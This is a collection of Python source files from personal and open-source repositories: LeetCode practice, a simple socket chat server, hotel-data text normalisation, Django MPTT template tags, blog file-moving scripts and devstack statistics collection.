if c <= 1:
head = head.next
return head
index = c-n
i = 0
pre = head
while pre.next is not None:
if i == index:
pre.next = pre.next.next
break
pre = pre.next
i += 1
return head
```
#### File: learn/leetcode/5_.py
```python
class Solution:
def longestPalindrome(self, s: str) -> str:
r_s = ''.join(reversed(s))
print(r_s)
S = Solution()
res = S.longestPalindrome('abaaaab')
print(res)
```
#### File: learn/leetcode/965.py
```python
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def __init__(self):
self.a = set()
    def make_data(self, root):
        # pre-order traversal; recursing on the children handles None safely
        if root:
            self.a.add(root.val)
            self.make_data(root.left)
            self.make_data(root.right)
    def make_data_2(self, root):
        # post-order variant of the same traversal
        if root:
            self.make_data_2(root.left)
            self.make_data_2(root.right)
            self.a.add(root.val)
def isUnivalTree(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
self.make_data(root)
return len(self.a) < 2
aa = Solution()
root = TreeNode(1)
root.left = TreeNode(1)
root.right = TreeNode(1)
b = aa.isUnivalTree(root)
print(b)
```
#### File: learn/leetcode/967.py
```python
class Solution:
def __init__(self):
self.s = dict()
def numsSameConsecDiff(self, N, K):
"""
:type N: int
:type K: int
:rtype: List[int]
"""
for x in range(K, 10):
mb = x-K
self.s[str(x)] = str(mb)
min_num = 10 ** (N-1)
nums = set()
if N % 2 == 0:
t = -1
else:
t = N
for a, b in self.s.items():
num_str = ""
num_str_2 = ""
while len(num_str) < N:
num_str += a
num_str += b
num_str_2 += b
num_str_2 += a
num_1 = int(num_str[:t])
num_2 = int(num_str_2[:t])
if num_1 >= min_num:
nums.add(num_1)
if num_2 >= min_num:
nums.add(num_2)
a = list(nums)
a.sort()
return a
aa = Solution()
b = aa.numsSameConsecDiff(N = 3, K = 2)
print(b)
```
#### File: learn/leetcode/973.py
```python
class Solution:
def count_l(self, a_list: list):
a, b = a_list
return a*a + b*b
def kClosest(self, points, K):
"""
:type points: List[List[int]]
:type K: int
:rtype: List[List[int]]
"""
m = list()
tmp = dict()
for point in points:
l = self.count_l(point)
if not tmp.get(l):
m.append(l)
tmp[l] = [point]
else:
tmp[l].append(point)
m.sort()
res = []
for x in m:
if len(res) == K:
break
for a in tmp[x]:
res.append(a)
if len(res) == K:
break
return res
if __name__ == '__main__':
s = Solution()
print(s.kClosest(points = [[1,3],[-2,2]], K = 1))
```
#### File: leetcode/tencent/14.py
```python
class Solution:
def longestCommonPrefix(self, strs):
"""
:type strs: List[str]
:rtype: str
"""
public_str = ""
```
#### File: learn/mi/102.py
```python
def solution(line):
    # use 4 spaces for indentation and follow PEP 8
# please write your code here
# return 'your_answer'
while 'mi' in line:
line = line.replace('mi', '')
return line
aa = solution('fwfddqhmpcmmmiiiijfrmiimmmmmirwbte')
print(aa)
```
#### File: learn/mi/137.py
```python
import sys
def big_f(n):
if n == 1:
return a
elif n == 2:
return b
else:
return (c ** d) * big_f(n - 1) * big_f(n - 2)
for line in sys.stdin:
line = line.strip()
a, b, c, d, mod, n = [int(h) for h in line.split(' ')]
xi_l = [big_f(x) % mod for x in range(1, n + 1)]
xi = 1
for x in xi_l:
xi *= x
xi %= mod
print((9 - len(str(xi))) * '0' + str(xi))
```
#### File: learn/mi/24.py
```python
def solution(line):
    # use 4 spaces for indentation and follow PEP 8
# please write your code here
# return 'your_answer'
nums = [int(x) for x in line.strip().split(',')]
nums.sort()
print(nums)
len_nums = len(nums)
if len_nums <= 1:
return 'false'
elif len_nums == 2 and nums[0] != nums[1]:
return 'false'
elif len_nums == 2 and nums[0] == nums[1]:
return 'true'
elif sum(nums) % 2 == 1:
return 'false'
else:
average = sum(nums) // 2
# num_j = []
# num_o = []
A = []
B = []
for num in nums:
if sum(B) >= sum(A):
A.append(num)
else:
B.append(num)
# if num % 2 == 1:
# num_j.append(num)
# else:
# num_o.append(num)
if num == average:
return 'true'
elif num > average:
return 'false'
print(A)
print(B)
if sum(A) == sum(B) and A:
return 'true'
m = min(len(A), len(B))
n = 0
while n < m:
for i in range(n, m):
A[i], B[i] = B[i], A[i]
if sum(A) == sum(B):
return 'true'
print()
n += 1
if __name__ == '__main__':
aa = solution("10,5,8,6,20,13,7,11")
print(aa)
"""
var g_channels = window.g_channels = {
201: {
id: 201,
name: '喜越国内'
},
203: {
id: 203,
name: '喜越国际'
},
293: {
id: 293,
name: 'Ctrip天驴国外'
},
294: {
id: 294,
name: 'Ctrip波妞海外'
},
296: {
id: 296,
name: 'Ctrip Ada'
},
1: {
id: 1,
name: '黑驴子'
},
2: {
id: 2,
name: '天旅'
},
3: {
name: '星途国际',
id: 3
},
4: {
id: 4,
name: '天宇'
},
5: {
id: 5,
name: '遨旅网'
},
6: {
id: 6,
name: '遨乐天下'
},
7: {
id: 7,
name: '遨房国际'
},
11: {
id: 11,
name: '飞猪'
},
19: {
id: 19,
name: '飞猪国际'
},
"""
```
#### File: learn/mi/5.py
```python
def solution(line):
    # use 4 spaces for indentation and follow PEP 8
# please write your code here
# return 'your_answer'
words = [int(x) for x in line.strip().split(',')]
words.sort() # ['10', '12', '13', '14', '5', '6', '7', '8', '9']
b = (len(words)-1)//2
return words[b]
a = solution('12,13,14,5,6,7,8,9,10')
print(a)
```
#### File: learn/mi/61.py
```python
def solution(line):
    # use 4 spaces for indentation and follow PEP 8
# please write your code here
# return 'your_answer'
nums_2 = [x.split(',') for x in line.strip().split(';')]
for i in range(len(nums_2)):
if nums_2[i] in nums_2[i+1:]:
return str(i+1)+','+str(nums_2[i+1:].index(nums_2[i])+(i+1)+1)
aa = solution("1,0,0,1,0;0,1,1,0,0;0,0,1,1,0;1,0,0,1,0;0,1,0,0,0")
print(aa)
```
#### File: learn/mi/79.py
```python
def solution(line):
    # use 4 spaces for indentation and follow PEP 8
# please write your code here
# return 'your_answer'
N, k, m = line.split(',')
N, k, m = int(N), int(k), int(m)
s = k % 16
```
#### File: learn/mi/7.py
```python
def solution(line):
    # use 4 spaces for indentation and follow PEP 8
# please write your code here
# return 'your_answer'
nums = [int(x) for x in line.strip().split(',') if int(x) > 0]
print(nums)
nums.sort()
count = 0
while nums:
num = nums.pop()
count += 1
if nums and (num-1 in nums):
continue
elif num-1:
return num-1
else:
return num+count
return 1
aa = solution("2,3")
print(aa)
```
#### File: learn/mi/97.py
```python
"""
@param string line a single line of test data
@return string the processed result
"""
def solution(line):
    # use 4 spaces for indentation and follow PEP 8
# please write your code here
# return 'your_answer'
x, y = line.strip().split(';')
A, B = x.split(' ')
A, B = int(A), int(B)
nums = [int(x) for x in y.split(' ')]
nums.sort()
if A == 0:
return 0.0
if B == 0:
return float(A)
    # ideal deployment distance (merge threshold)
k_m = 2*A/B
# j_s_list = []
count = 0
j_s = [nums[0]]
for i in range(1, len(nums)):
if nums[i]-nums[i-1] <= k_m:
j_s.append(nums[i])
else:
# j_s_list.append(j_s)
count += A+(j_s[-1]-j_s[0])/2*B
j_s = [nums[i]]
# j_s_list.append(j_s)
count += A+(j_s[-1]-j_s[0])/2*B
return float(count)
if __name__ == '__main__':
aa = solution("20 5;100 0 7 90")
```
#### File: learn/mi/98.py
```python
"""
@param string line a single line of test data
@return string the processed result
"""
def solution(line):
    # use 4 spaces for indentation and follow PEP 8
# please write your code here
# return 'your_answer'
nums = [int(x) for x in line.strip().split(' ')]
nums.sort()
s = set()
for x in range(len(nums)):
s.add(nums[-(x+1)]*(x+1))
return max(s)
aa = solution("5 0 29 14")
print(aa)
```
#### File: learn/mi/9.py
```python
def solution(line):
    # use 4 spaces for indentation and follow PEP 8
# please write your code here
# return 'your_answer'
a, bb = line.strip().split(' ')
b = int(bb)
if '0' in a and b >= a.index('0'):
return str(int(a[b:]))
else:
n = 0
l = len(a)
s = set()
while n <= l-b:
# s.add(int(a[n: n+l-b]))
s.add(int(a[0: n] + a[n+b:]))
n += 1
print(s)
return str(min(s))
aa = solution('1266 3')
print(aa)
```
#### File: python/class_case/case_1.py
```python
from python.class_case.base import Base
class Case1(Base):
def __init__(self):
Base.__init__(self)
self.a = 'a'
A = Case1()
print(A.a)
```
#### File: network_programming/socket_case/socket_server.py
```python
import socket
import threading
# create the server socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# bind to all interfaces on port 6959
server.bind(('0.0.0.0', 6959))
# listen with a backlog of 5
server.listen(5)
def handle_sock(sock):
while True:
        # receive data from the client
        recv_data = sock.recv(1024) # bufsize: read up to 1024 bytes
        print(recv_data.decode("utf8"))
        # send a reply back to the client
res_data = input()
sock.send(res_data.encode("utf8"))
while True:
    # accept an incoming client connection
sock, __ = server.accept()
    # handle the new connection (client) in its own thread
client_thread = threading.Thread(target=handle_sock, args=(sock,))
client_thread.start()
```
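A matching client for this little chat-style server could look like the sketch below; the host and port mirror the server above, and the message text is made up.
```python
import socket

# connect to the server defined above (assumed to run on the same machine)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('127.0.0.1', 6959))

# send one message, then block until the server operator types a reply
client.send('hello, server'.encode('utf8'))
reply = client.recv(1024)
print(reply.decode('utf8'))
client.close()
```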
#### File: python/sanic/test_get_post.py
```python
import asyncio
import redis
from sanic import Sanic
from sanic.response import json
app = Sanic()
connect = redis.Redis(
host='127.0.0.1',
password='',
port=6379,
decode_responses=True,
db=1
)
async def sleep_100():
    connect.set('hello', '1')
    # use a non-blocking sleep so the event loop stays responsive
    await asyncio.sleep(5)
    print(10086)
@app.route('/test', methods=["GET", "POST"])
async def test(req):
name_list = req.json.get("name")
if connect.get('hello') != '1':
asyncio.ensure_future(sleep_100())
return json({
"name": name_list,
})
if __name__ == '__main__':
app.run(host='0.0.0.0', port=6664) # , workers=4
```
#### File: python/test/test_vague.py
```python
import unicodedata
import re
# Supplier Ctrip concatenates attributes; this marker key appears in most entries, which carry an area attribute in the format below
SplCtripIdentifier = 'area:'
SplCtripIdentifierCN = '面积:'
# Ctrip attribute filter: attributes are usually appended at the end, guarded by "("
SplCtripSplit = '('
# Latin character set: 26 letters, 10 digits, and the space character
UsCharSet = {'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k',
'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6',
'7', '8', '9', ' '}
# strip all diacritical marks
def shave_makes(txt) -> str:
txt = txt or ''
norm_txt = unicodedata.normalize('NFD', txt)
shaved = ''.join(c for c in norm_txt if not unicodedata.combining(c))
return unicodedata.normalize('NFC', shaved)
# handle Western (Win1252) characters
# BEGIN ASCIIZE
single_map = str.maketrans("""‚ƒ„†ˆ‹‘’“”•–—˜›""", # <1>
"""'f"*^<''""---~>""")
multi_map = str.maketrans({ # <2>
'€': '<euro>',
'…': '...',
'Œ': 'OE',
'™': '(TM)',
'œ': 'oe',
'‰': '<per mille>',
'‡': '**',
})
# convert some common Win1252 symbols
def dewinize(txt: str) -> str:
txt = txt or ''
"""Replace Win1252 symbols with ASCII chars or sequences"""
return txt.translate(multi_map) # <4>
# remove the substring between a given pair of characters
def remove_strings_between_specified_characters(txt: str, character_pairs: tuple = ('(', ')')):
"""
    Normalize Agoda city strings
"""
if character_pairs is None or not character_pairs:
return txt
a, b = character_pairs
index_a = txt.find(a)
index_b = txt.find(b)
    if index_a < 0: # the opening character was not found
return txt
    elif index_b < 0: # the closing character was not found
return txt[:index_a]
else:
return txt[:index_a] + txt[index_b + 1:]
# filter characters, with added handling for diacritics [see Fluent Python 4.6.3]; TODO: used for data preprocessing and text filtering
def str_filter_plus(a_string, character_pairs=None):
    # strip the attributes appended by supplier Ctrip
if SplCtripIdentifier in a_string.lower():
a_string = SplCtripSplit.join(a_string.split(SplCtripSplit)[:-1])
if SplCtripIdentifierCN in a_string:
a_string = SplCtripSplit.join(a_string.split(SplCtripSplit)[:-1])
    # remove the substring between the given character pair
a_string = remove_strings_between_specified_characters(a_string, character_pairs)
    # keep the characters we need
def before_str_filter(before_string: str) -> str:
maybe_dict = {
'|': ' or ',
' ': 'oyjx',
'&': ' and ',
'/': ' or ',
"\\": ' or ',
'(': 'oyjx',
')': 'oyjx',
"(": 'oyjx',
")": 'oyjx',
"-": 'oyjx',
"_": 'oyjx',
',': ' ',
',': ' ',
}
maybe_map = str.maketrans(maybe_dict)
# key_list = ['&', '/', '\\', ' ', '-', '(', ')', "(", ")", "_"]
# for key in key_list:
# if key in before_string:
# before_string = before_string.replace(key, maybe_dict[key])
# print(before_string)
        # use str's built-in translate
return before_string.translate(maybe_map)
    # replace the placeholder back with ' ' and collapse repeated spaces into one
def after_str_filter(after_string: str) -> str:
after_string = after_string.replace('oyjx', ' ')
return re.sub(' +', ' ', after_string)
    # step 1: strip diacritics
a_string = dewinize(shave_makes(a_string))
    # step 2: preserve needed characters
before_string = before_str_filter(a_string.lower())
# print(string)
    # step 3: filter
return after_str_filter(re.sub('[^\w\u4e00-\u9fff]+', '', before_string)).strip()
def strings_type_cn(strings: str) -> bool:
# en_count, cn_count = 0, 0
cn_count = 0
strings = str_filter_plus(strings.lower())
for char in strings:
if char not in UsCharSet:
cn_count += 1
# return cn_count > 2 * en_count
return cn_count > 2 or (len(strings) - cn_count <= 2)
if __name__ == '__main__':
print(strings_type_cn("豪华大床房"))
```
#### File: learn/test/dict_2_nametuple.py
```python
from collections import namedtuple
# convert a dict object into a namedtuple
def dict_to_namedtuple(*, obj: dict):
NamedTuple = namedtuple('NamedTuple', obj.keys())
return NamedTuple(**obj)
dct = {
"RoomTypeID": 763417,
"StandardBedType": "1 Double or 2 Twin beds (大床或双床)",
"BedTypeID": 9,
"RoomTypeName": "Adjoining Semi Double Room, Smoking",
"RoomTypeNameCN": "客房, 吸烟房 (Adjoining Semi Double Room )",
"BedTypeDescCN": "<p>2 张单人床",
"BedTypeDesc": "<p>2 Twin Beds",
"SRoomID": 139461,
"SupplierID": 6,
"SourceRoomID": "",
"UserName": None,
"UserRemark": None,
"Status": 14
}
print(dict_to_namedtuple(obj=dct))
```
#### File: 1005281342/learn/test__.py
```python
import asyncio
async def hello_world():
print("Hello World! 23456789")
loop = asyncio.get_event_loop()
# Blocking call which returns when the hello_world() coroutine is done
loop.run_until_complete(hello_world())
loop.close()
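# Note (added): on Python 3.7+ the idiomatic equivalent is a single call,
#
#   asyncio.run(hello_world())
#
# which creates the event loop, runs the coroutine, and closes the loop.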
``` |
{
"source": "100615056/Private-Class",
"score": 4
} |
#### File: Private-Class/Pyramid/positive.py
```python
def main():
    num = positive_number()
    print(num)
def positive_number():
    while True:
        # Get Number
        number = int(input("Enter positive number: "))
        # If positive number, exit
        # Else ask again
        if number > 0:
            break
    return number
main()
```
#### File: Private-Class/Pyramid/right-aligned.py
```python
def valid_pyramid():
while True:
# Get Number
number = int(input("Enter Number: "))
# Check that number is within range
if number >= 1 and number <= 8:
break
return number
# Print right-aligned pyramid
def print_pyramid(number, spaces):
for i in range(number):
for j in range(spaces):
print(' ', end='')
for k in range(i + 1):
print('#', end='')
print()
spaces -= 1
# Calculate spaces needed
def calculate_spaces(height):
space = height
return space
def main():
height = valid_pyramid()
spaces = calculate_spaces(height)
print_pyramid(height, spaces)
main()
``` |
{
"source": "1007047/Django-MPTT-With-Checkbox-and-Radio-button",
"score": 2
} |
#### File: mptt/templatetags/mptt_tags.py
```python
from django import template
from django.apps import apps
from django.core.exceptions import FieldDoesNotExist
from django.utils.encoding import force_str
from django.utils.safestring import mark_safe
from django.utils.translation import gettext as _
from mptt.utils import drilldown_tree_for_node, get_cached_trees, tree_item_iterator
register = template.Library()
# ## ITERATIVE TAGS
class FullTreeForModelNode(template.Node):
def __init__(self, model, context_var):
self.model = model
self.context_var = context_var
def render(self, context):
cls = apps.get_model(*self.model.split("."))
if cls is None:
raise template.TemplateSyntaxError(
_("full_tree_for_model tag was given an invalid model: %s") % self.model
)
context[self.context_var] = cls._tree_manager.all()
return ""
class DrilldownTreeForNodeNode(template.Node):
def __init__(
self,
node,
context_var,
foreign_key=None,
count_attr=None,
cumulative=False,
all_descendants=False,
):
self.node = template.Variable(node)
self.context_var = context_var
self.foreign_key = foreign_key
self.count_attr = count_attr
self.cumulative = cumulative
self.all_descendants = all_descendants
def render(self, context):
# Let any VariableDoesNotExist raised bubble up
args = [self.node.resolve(context)]
if self.foreign_key is not None:
app_label, model_name, fk_attr = self.foreign_key.split(".")
cls = apps.get_model(app_label, model_name)
if cls is None:
raise template.TemplateSyntaxError(
_("drilldown_tree_for_node tag was given an invalid model: %s")
% ".".join([app_label, model_name])
)
try:
cls._meta.get_field(fk_attr)
except FieldDoesNotExist:
raise template.TemplateSyntaxError(
_(
"drilldown_tree_for_node tag was given an invalid model field: %s"
)
% fk_attr
)
args.extend([cls, fk_attr, self.count_attr, self.cumulative])
context[self.context_var] = drilldown_tree_for_node(
*args, all_descendants=self.all_descendants
)
return ""
@register.tag
def full_tree_for_model(parser, token):
"""
Populates a template variable with a ``QuerySet`` containing the
full tree for a given model.
Usage::
{% full_tree_for_model [model] as [varname] %}
The model is specified in ``[appname].[modelname]`` format.
Example::
{% full_tree_for_model tests.Genre as genres %}
"""
bits = token.contents.split()
if len(bits) != 4:
raise template.TemplateSyntaxError(
_("%s tag requires three arguments") % bits[0]
)
if bits[2] != "as":
raise template.TemplateSyntaxError(
_("second argument to %s tag must be 'as'") % bits[0]
)
return FullTreeForModelNode(bits[1], bits[3])
@register.tag("drilldown_tree_for_node")
def do_drilldown_tree_for_node(parser, token):
"""
Populates a template variable with the drilldown tree for a given
node, optionally counting the number of items associated with its
children.
A drilldown tree consists of a node's ancestors, itself and its
immediate children or all descendants. For example, a drilldown tree
for a book category "Personal Finance" might look something like::
Books
Business, Finance & Law
Personal Finance
Budgeting (220)
Financial Planning (670)
Usage::
{% drilldown_tree_for_node [node] as [varname] %}
Extended usage::
{% drilldown_tree_for_node [node] as [varname] all_descendants %}
{% drilldown_tree_for_node [node] as [varname] count [foreign_key] in [count_attr] %}
{% drilldown_tree_for_node [node] as [varname] cumulative count [foreign_key] in [count_attr] %}
The foreign key is specified in ``[appname].[modelname].[fieldname]``
format, where ``fieldname`` is the name of a field in the specified
model which relates it to the given node's model.
When this form is used, a ``count_attr`` attribute on each child of
the given node in the drilldown tree will contain a count of the
number of items associated with it through the given foreign key.
If cumulative is also specified, this count will be for items
related to the child node and all of its descendants.
Examples::
{% drilldown_tree_for_node genre as drilldown %}
{% drilldown_tree_for_node genre as drilldown count tests.Game.genre in game_count %}
{% drilldown_tree_for_node genre as drilldown cumulative count tests.Game.genre in game_count %}
""" # noqa
bits = token.contents.split()
len_bits = len(bits)
if len_bits not in (4, 5, 8, 9, 10):
raise template.TemplateSyntaxError(
_("%s tag requires either three, four, seven, eight, or nine arguments")
% bits[0]
)
if bits[2] != "as":
raise template.TemplateSyntaxError(
_("second argument to %s tag must be 'as'") % bits[0]
)
all_descendants = False
if len_bits > 4:
if bits[4] == "all_descendants":
len_bits -= 1
bits.pop(4)
all_descendants = True
if len_bits == 8:
if bits[4] != "count":
raise template.TemplateSyntaxError(
_(
"if seven arguments are given, fourth argument to %s tag must be 'with'"
)
% bits[0]
)
if bits[6] != "in":
raise template.TemplateSyntaxError(
_("if seven arguments are given, sixth argument to %s tag must be 'in'")
% bits[0]
)
return DrilldownTreeForNodeNode(
bits[1], bits[3], bits[5], bits[7], all_descendants=all_descendants
)
elif len_bits == 9:
if bits[4] != "cumulative":
raise template.TemplateSyntaxError(
_(
"if eight arguments are given, fourth argument to %s tag must be 'cumulative'"
)
% bits[0]
)
if bits[5] != "count":
raise template.TemplateSyntaxError(
_(
"if eight arguments are given, fifth argument to %s tag must be 'count'"
)
% bits[0]
)
if bits[7] != "in":
raise template.TemplateSyntaxError(
_(
"if eight arguments are given, seventh argument to %s tag must be 'in'"
)
% bits[0]
)
return DrilldownTreeForNodeNode(
bits[1],
bits[3],
bits[6],
bits[8],
cumulative=True,
all_descendants=all_descendants,
)
else:
return DrilldownTreeForNodeNode(
bits[1], bits[3], all_descendants=all_descendants
)
@register.filter
def tree_info(items, features=None):
"""
Given a list of tree items, produces doubles of a tree item and a
``dict`` containing information about the tree structure around the
item, with the following contents:
new_level
``True`` if the current item is the start of a new level in
the tree, ``False`` otherwise.
closed_levels
A list of levels which end after the current item. This will
be an empty list if the next item is at the same level as the
current item.
Using this filter with unpacking in a ``{% for %}`` tag, you should
have enough information about the tree structure to create a
hierarchical representation of the tree.
Example::
{% for genre,structure in genres|tree_info %}
{% if structure.new_level %}<ul><li>{% else %}</li><li>{% endif %}
{{ genre.name }}
{% for level in structure.closed_levels %}</li></ul>{% endfor %}
{% endfor %}
"""
kwargs = {}
if features:
feature_names = features.split(",")
if "ancestors" in feature_names:
kwargs["ancestors"] = True
return tree_item_iterator(items, **kwargs)
@register.filter
def tree_path(items, separator=" :: "):
"""
Creates a tree path represented by a list of ``items`` by joining
the items with a ``separator``.
Each path item will be coerced to unicode, so a list of model
instances may be given if required.
Example::
{{ some_list|tree_path }}
{{ some_node.get_ancestors|tree_path:" > " }}
"""
return separator.join(force_str(i) for i in items)
# ## RECURSIVE TAGS
@register.filter
def cache_tree_children(queryset):
"""
Alias to `mptt.utils.get_cached_trees`.
"""
return get_cached_trees(queryset)
class RecurseTreeNode(template.Node):
def __init__(self, template_nodes, queryset_var):
self.template_nodes = template_nodes
self.queryset_var = queryset_var
def _render_node(self, context, node):
bits = []
context.push()
for child in node.get_children():
bits.append(self._render_node(context, child))
context["node"] = node
context["children"] = mark_safe("".join(bits))
rendered = self.template_nodes.render(context)
context.pop()
return rendered
def render(self, context):
queryset = self.queryset_var.resolve(context)
roots = cache_tree_children(queryset)
bits = [self._render_node(context, node) for node in roots]
return "".join(bits)
@register.tag
def recursetree(parser, token):
"""
Iterates over the nodes in the tree, and renders the contained block for each node.
This tag will recursively render children into the template variable {{ children }}.
Only one database query is required (children are cached for the whole tree)
Usage:
<ul>
{% recursetree nodes %}
<li>
{{ node.name }}
{% if not node.is_leaf_node %}
<ul>
{{ children }}
</ul>
{% endif %}
</li>
{% endrecursetree %}
</ul>
"""
bits = token.contents.split()
if len(bits) != 2:
raise template.TemplateSyntaxError(_("%s tag requires a queryset") % bits[0])
queryset_var = template.Variable(bits[1])
template_nodes = parser.parse(("endrecursetree",))
parser.delete_first_token()
return RecurseTreeNode(template_nodes, queryset_var)
``` |
{
"source": "1007530194/Dairy2",
"score": 3
} |
#### File: diary/src/MoveFileFromQuiver.py
```python
import os
import shutil
import time
root = "/Users/weidian/Documents/Diary/"
temp_path = root + "_posts/temp/"
post_path = root + "_posts/"
image_path = root + "assets/images/"
def move_md_file(from_path, to_path, dir_path):
fr = open(from_path, 'r')
fw = open(to_path, 'w')
for data in fr.readlines():
if "](resources/" in data:
data = data.replace("resources", "{{ site.baseurl }}{{ site.images }}/" + dir_path)
fw.write(data)
fr.close()
fw.close()
os.remove(from_path)
# move images
def move_image(from_path, to_path):
if not os.path.exists(to_path):
os.mkdir(to_path)
print "移动图片文件夹" + from_path + "\t" + to_path
for dir_path in os.listdir(from_path):
shutil.move(from_path + "/" + dir_path, to_path + "/" + dir_path)
shutil.rmtree(from_path)
def solver(dir_path):
print "*****************************************"
print "移动文件夹" + dir_path
tag_path = post_path + dir_path
if not os.path.exists(tag_path):
os.mkdir(tag_path)
for file_path in os.listdir(temp_path + dir_path):
if file_path == "resources":
from_path = temp_path + dir_path + "/" + file_path
to_path = image_path + dir_path
move_image(from_path, to_path)
elif ".md" in file_path:
print time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
from_path = temp_path + dir_path + "/" + file_path
to_path = tag_path + "/" + time.strftime("%Y-%m-%d-", time.localtime()) + file_path
move_md_file(from_path, to_path, dir_path)
shutil.rmtree(temp_path + dir_path)
if __name__ == '__main__':
print "start"
for dir_path in os.listdir(temp_path):
if os.path.isdir(temp_path + dir_path):
print (dir_path + " is dir")
solver(dir_path)
print "end"
``` |
{
"source": "1007530194/Dairy",
"score": 3
} |
#### File: book/splider/MachineLearninginAction.py
```python
import re
import urllib
import requests
from bs4 import BeautifulSoup
github_root = "https://github.com"
github_raw = "https://raw.githubusercontent.com"
s1 = "https://raw.githubusercontent.com/apachecn/MachineLearning/python-2.7/LICENSE"
s2 = "https://raw.githubusercontent.com/apachecn/MachineLearning/blob/python-2.7/LICENSE"
def downLoadFile(url, title):
url = url.replace("/blob", "")
print("download file FROM \t" + url + "\t to \t" + title)
if re.search("(jpg|png|jpeg)", title):
urllib.urlretrieve(github_raw + url, title)
#
# r = requests.get(github_raw + url)
# with open(title, 'wb') as f:
# f.write(r.content)
else:
url = github_raw + url
print (url)
req = requests.get(url)
soup = BeautifulSoup(req.content.decode("gbk", "ignore"), 'lxml')
with open(title, 'wb') as f:
f.write(soup.find("p").text.decode("utf8", "ignore"))
def getPath(url):
req = requests.get(url)
soup = BeautifulSoup(req.content.decode('gbk', 'ignore'), 'lxml')
# soup = BeautifulSoup(req.content, 'lxml')
tables = soup.find("table", "files js-navigation-container js-active-navigation-container")
for file_wrap in tables.find_all("tr", "js-navigation-item"):
context = file_wrap.find("a", "js-navigation-open")
path = context.attrs["href"]
title = context.text
print (path + "\t" + title)
if 'octicon-file-directory' in file_wrap.find("td", "icon").find("svg").attrs["class"]:
print "directory"
elif 'octicon-file' in file_wrap.find("svg").attrs["class"]:
print "file"
downLoadFile(path, title)
if __name__ == '__main__':
url = "https://github.com/apachecn/MachineLearning"
getPath(url=url)
``` |
{
"source": "1007827412/Precise-Medicine-Online-Cloud-Platform",
"score": 2
} |
#### File: 1007827412/Precise-Medicine-Online-Cloud-Platform/rcnn_bc_recognition.py
```python
import cv2
def recognize(img, imgdir):
cv2.imwrite(imgdir,img)
``` |
{
"source": "10088/devstack",
"score": 2
} |
#### File: devstack/tools/get-stats.py
```python
import argparse
import csv
import datetime
import glob
import itertools
import json
import logging
import os
import re
import socket
import subprocess
import sys
try:
import psutil
except ImportError:
psutil = None
print('No psutil, process information will not be included',
file=sys.stderr)
try:
import pymysql
except ImportError:
pymysql = None
print('No pymysql, database information will not be included',
file=sys.stderr)
LOG = logging.getLogger('perf')
# https://www.elastic.co/blog/found-crash-elasticsearch#mapping-explosion
def tryint(value):
try:
return int(value)
except (ValueError, TypeError):
return value
def get_service_stats(service):
stats = {'MemoryCurrent': 0}
output = subprocess.check_output(['/usr/bin/systemctl', 'show', service] +
['-p%s' % stat for stat in stats])
for line in output.decode().split('\n'):
if not line:
continue
stat, val = line.split('=')
stats[stat] = tryint(val)
return stats
def get_services_stats():
services = [os.path.basename(s) for s in
glob.glob('/etc/systemd/system/devstack@*.service')] + \
['apache2.service']
return [dict(service=service, **get_service_stats(service))
for service in services]
def get_process_stats(proc):
cmdline = proc.cmdline()
if 'python' in cmdline[0]:
cmdline = cmdline[1:]
return {'cmd': cmdline[0],
'pid': proc.pid,
'args': ' '.join(cmdline[1:]),
'rss': proc.memory_info().rss}
def get_processes_stats(matches):
me = os.getpid()
procs = psutil.process_iter()
def proc_matches(proc):
return me != proc.pid and any(
re.search(match, ' '.join(proc.cmdline()))
for match in matches)
return [
get_process_stats(proc)
for proc in procs
if proc_matches(proc)]
def get_db_stats(host, user, passwd):
dbs = []
try:
        db = pymysql.connect(host=host, user=user, password=passwd,
database='stats',
cursorclass=pymysql.cursors.DictCursor)
except pymysql.err.OperationalError as e:
if 'Unknown database' in str(e):
print('No stats database; assuming devstack failed',
file=sys.stderr)
return []
raise
with db:
with db.cursor() as cur:
cur.execute('SELECT db,op,count FROM queries')
for row in cur:
dbs.append({k: tryint(v) for k, v in row.items()})
return dbs
def get_http_stats_for_log(logfile):
stats = {}
apache_fields = ('host', 'a', 'b', 'date', 'tz', 'request', 'status',
'length', 'c', 'agent')
ignore_agents = ('curl', 'uwsgi', 'nova-status')
for line in csv.reader(open(logfile), delimiter=' '):
fields = dict(zip(apache_fields, line))
if len(fields) != len(apache_fields):
# Not a combined access log, so we can bail completely
return []
try:
method, url, http = fields['request'].split(' ')
except ValueError:
method = url = http = ''
if 'HTTP' not in http:
# Not a combined access log, so we can bail completely
return []
# Tempest's User-Agent is unchanged, but client libraries and
# inter-service API calls use proper strings. So assume
# 'python-urllib' is tempest so we can tell it apart.
if 'python-urllib' in fields['agent'].lower():
agent = 'tempest'
else:
agent = fields['agent'].split(' ')[0]
if agent.startswith('python-'):
agent = agent.replace('python-', '')
if '/' in agent:
agent = agent.split('/')[0]
if agent in ignore_agents:
continue
try:
service, rest = url.strip('/').split('/', 1)
except ValueError:
# Root calls like "GET /identity"
service = url.strip('/')
rest = ''
method_key = '%s-%s' % (agent, method)
try:
length = int(fields['length'])
except ValueError:
LOG.warning('[%s] Failed to parse length %r from line %r' % (
logfile, fields['length'], line))
length = 0
stats.setdefault(service, {'largest': 0})
stats[service].setdefault(method_key, 0)
stats[service][method_key] += 1
stats[service]['largest'] = max(stats[service]['largest'],
length)
# Flatten this for ES
return [{'service': service, 'log': os.path.basename(logfile),
**vals}
for service, vals in stats.items()]
def get_http_stats(logfiles):
return list(itertools.chain.from_iterable(get_http_stats_for_log(log)
for log in logfiles))
def get_report_info():
return {
'timestamp': datetime.datetime.now().isoformat(),
'hostname': socket.gethostname(),
'version': 2,
}
if __name__ == '__main__':
process_defaults = ['privsep', 'mysqld', 'erlang', 'etcd']
parser = argparse.ArgumentParser()
parser.add_argument('--db-user', default='root',
help=('MySQL user for collecting stats '
'(default: "root")'))
parser.add_argument('--db-pass', default=None,
help='MySQL password for db-user')
parser.add_argument('--db-host', default='localhost',
help='MySQL hostname')
parser.add_argument('--apache-log', action='append', default=[],
help='Collect API call stats from this apache log')
parser.add_argument('--process', action='append',
default=process_defaults,
help=('Include process stats for this cmdline regex '
'(default is %s)' % ','.join(process_defaults)))
args = parser.parse_args()
